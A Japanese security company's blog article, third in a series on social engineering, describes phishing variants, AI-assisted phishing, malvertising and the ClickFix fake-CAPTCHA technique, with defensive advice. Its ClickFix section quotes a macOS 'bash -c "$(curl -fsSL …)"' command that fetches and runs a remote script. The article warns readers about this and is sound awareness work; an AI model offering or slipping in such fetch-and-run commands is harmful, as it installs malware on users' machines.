Security NEWS TOPに戻る
バックナンバー TOPに戻る
【関連ウェビナー開催情報】
弊社では7月23日(水)14:00より、「急増するフィッシング攻撃の実態と対策〜企業を守る多層防御とは〜」と題したウェビナーを開催予定です。多要素認証や従業員教育、技術的防御など多層的なアプローチに加え、当社ソリューションによる効果的な防御手法もご紹介します。ご関心がおありでしたらぜひお申込みください。詳細はこちら。
本シリーズでは、「ソーシャルエンジニアリング最前線」として、2025年6月現在のフィッシングに代表されるソーシャルエンジニアリングに関する動向と企業・個人が取れる対策をまとめます。第3回はフィッシングを含めたソーシャルエンジニアリング攻撃の目的、最近話題の手口についてまとめます。
ソーシャルエンジニアリング攻撃の目的と心理的手口
ソーシャルエンジニアリング攻撃は攻撃者が被害者の心理や認知機能のバグを悪用したハッキング技法であることは第1回で紹介した通りです。ここではどんな手口でソーシャルエンジニアリング攻撃が仕掛けられるかを解説します。
最も多いソーシャルエンジニアリングの手口「フィッシング」
ソーシャルエンジニアリング攻撃で最も知られている手口はフィッシングでしょう。
フィッシングメールの種類
フィッシングといわれて最初に思い浮かべるフィッシングメールはフィッシングの一形態にあたります。フィッシングメールにもさまざまな種類があります。
- フィッシングメールにマルウェアやマルウェアのダウンロードを行うアプリケーションを添付
メールサービスやPCの機能などで検知しやすいことでも知られる - フィッシングメールにリンクを挿入し、リンク先から個人情報や認証情報を盗む、またはマルウェアのダウンロードを行う
最近見られる手法にMicrosoft 365やGoogle Workspaceのログイン画面を精緻に再現した偽画面を使ったAiTMがある。日本国内で3月から5月にかけて問題となった証券口座への不正アクセス・不正取引事件も多くはこの手法を用いられたものと考えられる - 組織のコントロール外のサービスへ誘導し、マルウェアのダウンロードを行う
会社のPCで求人サイトにアクセスし、会社で使用しているアカウントでGitHubにログインした状態で偽の採用担当者から指示された通り、コードを実行した結果暗号資産が盗難される事件などが発生している
さて、最近ではフィッシングもメールだけのものではなくなりました。
SMSを悪用した「Smishing(スミッシング)」
スミッシングはSMSで行われるフィッシングです。皆さまがよく知るものでは宅配事業者の不在配達通知のSMSによるスミッシングがこれに該当します。
QRコード型フィッシング「Quishing(クイッシング)」
街中でお店のメニューやお店のSNS、レンタルのためなどいろいろなところで見かけるQRコードですが、このQRコードが偽のログイン画面や偽の決済画面にリンクしているものをQuishing(クイッシング)といいます。イギリスの例では、駐車場の支払機にあるQRコードからアプリケーションのダウンロードを促されてアプリケーションをダウンロードした際、銀行口座の詳細確認のために90ペンス(約176円)の手数料に同意したところ、年間39ポンド(約7,600円)の払い戻し条件なしのサブスクリプションサービスを契約させられていたケース 注 1)もあります。
当初の被害が小さい(前述の例は90ペンス)ことなどから気付いても通報に至らないこと、決済情報や個人情報をQRコードでアクセスしたサイトで入力しているケースが多く、あとから詐欺に再度遭うこともあります。また、1人だけの被害であれば少額ですが、同じような被害者が数十人、数百人いるとさらに被害は拡大します。日本では現時点では一般的な手口ではありませんが、技術をさほど必要としない点を考慮すると同じ手口が流布する可能性が十分ある点に注意が必要でしょう。
フィッシング・スミッシング・クイッシングの共通対策とは?
フィッシング、スミッシング、クイッシングに共通する個人レベルの対策法は公式アプリ、公式サイト(ブックマーク)からのアクセスを心掛けることです。また、企業から貸与された端末経由でマルウェアのダウンロードをされるケースもあることから、企業から貸与された端末は目的外で使用しないことを徹底することも重要です。
音声通話を悪用する「Vishing(ビッシング)」
こちらは「声」によるフィッシング、Vishing(ビッシング)です。日本国内の被害事例としては2025年3月に山形鉄道が地元銀行を騙る自動音声の電話から誘導され、インターネットバンキングを経由し、およそ1億円の詐欺被害に遭った事例があります。
インターネットバンキングによる送金詐欺以外には自動音声との組み合わせによるテクニカルサポート詐欺などがあります。また、最近では警察を騙る自動音声通話なども報告されています 注 2)。基本的に自動音声でかかってくる電話はビッシングを疑ったほうがよいのが現状です。いったん電話を切ってから警察相談専用電話#9110や消費者ホットライン188に相談しましょう。
生成AIの進化で加速化するフィッシング手法
フィッシング全般に共通しますが、数年前であればフィッシングメールやSMSの文面の日本語がたどたどしかったり、日本語で使われない漢字が使用されたりといった違和感から怪しさに気付けたのですが、ここ1年ほどは生成AIの発展により、日本語のテキストからたどたどしさや違和感が急速に消えています。第2回で取り上げたフィッシングメールも文法や語彙としておかしな箇所は非常に少なく、注意力が低下しているときや慌てているときであれば気付かないかもしれないという危機感を抱くレベルです。最近ではアメリカFBIが政府高官のディープフェイクによる音声メッセージについて警告を発したり 注 3)、実際にアメリカ政府高官の顔写真などからAIが生成した音声を悪用したりする事例 注 4)が報告されています。文章によるフィッシングだけではなく、音声や画像、動画によるフィッシングについても、今後は警戒する必要があるでしょう。また、生成AIでWebページを生成するサービスも出現しています。一部のサービスには脆弱性があり、生成・公開されたページからユーザの情報やAIサービスのAPIキーなどの漏洩が可能という問題があります。
なお、このサービスでWebページを作るにはプロンプトを入力すればよいだけなので、ページによっては10~15分程度でフォームも含めて立ち上げることが可能です。また、サービスによってはAiTM用のなりすましページの作成などに制限もかからない可能性があり、生成AIによるソーシャルエンジニアリング攻撃への影響は多大なものがあります。
マルバタイジング(悪意ある広告)によるフィッシングの脅威
広告を介したソーシャルエンジニアリングをご存じでしょうか。一般的にはマルバタイジング(Malvertising)と呼ばれる手法で、広告から誘導する先が悪意のあるWebサイトである場合を指します。例えば以下のような事例があります。
- 違法なストリーミングサイトに埋め込まれたマルバタイジングのリダイレクタからマルウェアが複数段に分けてダウンロードされ、認証情報が盗み取られた事例 注 5)
- 正規のGoogle広告主の広告管理用サービスのアカウントを乗っ取り、マルバタイジングを行う事例 注 6)
フィッシングと偽CAPTCHA:ClickFixの新手口に注意
フィッシングやマルバタイジングなどの手法と併用されるものとして、ClickFixや偽CAPTCHA(Fake CAPTCHA)という手法があります。ClickFixはもともと、アプリケーションのダウンロードサイトなどを模した偽サイトでエラー画面に模した画面を表示し、被害者にコマンドをコピーアンドペーストさせてマルウェアをダウンロードさせる攻撃です。元は不具合を修正(Fix)するためにコマンドを実行させることからついた名前ですが、もちろん修正すべきものは何もなく、セキュリティ防御のためのシステム(EDRなど)の検知をかいくぐるためにユーザにコマンドを実行させる点に特徴があります。
ClickFixは単純なコマンドのコピーアンドペーストと実行から、その後偽のCAPTCHAやreCAPTCHA を介してコマンドを実行させるものへと進化しています。CAPTCHA または reCAPTCHA 認証に失敗したと見せかけて、コマンドのコピーアンドペーストと実行手順を表示し、エラーの解消にはこの手順を実行せよとするものです。実行手順にはWindowsであれば必ず Windowsボタン+R(Windowsのファイル名指定実行のショートカット)、macOSユーザであれば/bin/bash -c “$(curl -fsSL リモートのシェルファイルへのパス)”が表示されます。いずれもファイルを実行するための手順となります。これを見たら怪しいと思ってWebページを閉じ、会社のマシンを使っている場合は必ずIT部門に報告しましょう。
このほかにも宿泊予約サイトに見せかけたClickFix手法も観測されています 注 7)。ダウンロードされるマルウェアは RAT やインフォスティーラーなど各種あり、この手法を悪用する攻撃者も様々です。日本語での事例はあまり見かけませんが、日本に対して過去に攻撃を実行したグループでの悪用例があり、画面の再現や実行手順の翻訳さえ整ってしまえばいつでも実行可能であることから、警戒するに越したことはありません。
放置ドメインの悪用によるフィッシングリスクと対策
閉鎖したはずのサブドメインやドメインが侵害され、フィッシングの誘導先やフィッシングメールの送信元として悪用されることもあります。自社のドメインやサブドメインが悪用されていないかの確認を定期的に行い、自社ブランドの価値を維持することも非常に重要です。
アタックサーフェス調査の詳細については以下の記事をご参照ください。
「ASM(Attack Surface Management)と脆弱性診断」
企業が狙われるビジネスメール詐欺(BEC):フィッシングの延長にある脅威
ビジネスメール詐欺についてはこちらの記事をご参照ください。
「情報セキュリティ10大脅威」3年連続ベスト3入り、ビジネスメール詐欺を防ぐ手立ては?」
―第4回「企業が実践すべきフィッシング対策とは?」へ続く―
【連載一覧】
第4回「企業が行うべきフィッシング対策」」へ続く―
―第1回「ソーシャルエンジニアリングの定義と人という脆弱性」―
―第2回「実例で解説!フィッシングメールの手口と対策」―
―第4回「企業が実践すべきフィッシング対策とは?」―
【関連記事】
・【重要】楽天証券・SBI 証券をかたるフィッシングメールにご注意!
・IPA 情報セキュリティ10大脅威からみる―注目が高まる犯罪のビジネス化―
・フィッシングとは?巧妙化する手口とその対策
・「情報セキュリティ 10 大脅威」3 年連続ベスト 3 入り、ビジネスメール詐欺を防ぐ手立ては?
注:
1)https://www.bbc.com/news/articles/cq6yznmv3gzo
2)https://www.keishicho.metro.tokyo.lg.jp/kurashi/tokushu/police_officer.html
3)https://www.ic3.gov/PSA/2025/PSA250515
4)https://www.msn.com/en-us/news/us/us-government-is-investigating-messages-impersonating-trumps-chief-of-staff-susie-wiles/ar-AA1FMU7f
5)https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/
6)https://www.malwarebytes.com/blog/news/2025/01/the-great-google-ads-heist-criminals-ransack-advertiser-accounts-via-fake-google-ads
7)https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/
Security NEWS TOPに戻る
バックナンバー TOPに戻る
ウェビナー開催のお知らせ
「SQAT®ペネトレーションテスト実演付き!-攻撃の“成立”を見極めるペネトレーションテストとは-」
「進化するランサムウェア攻撃-国内最新事例から学ぶ!被害を防ぐ実践ポイント10項目を解説-」
「急増するフィッシング攻撃の実態と対策〜企業を守る多層防御とは〜」
最新情報はこちら
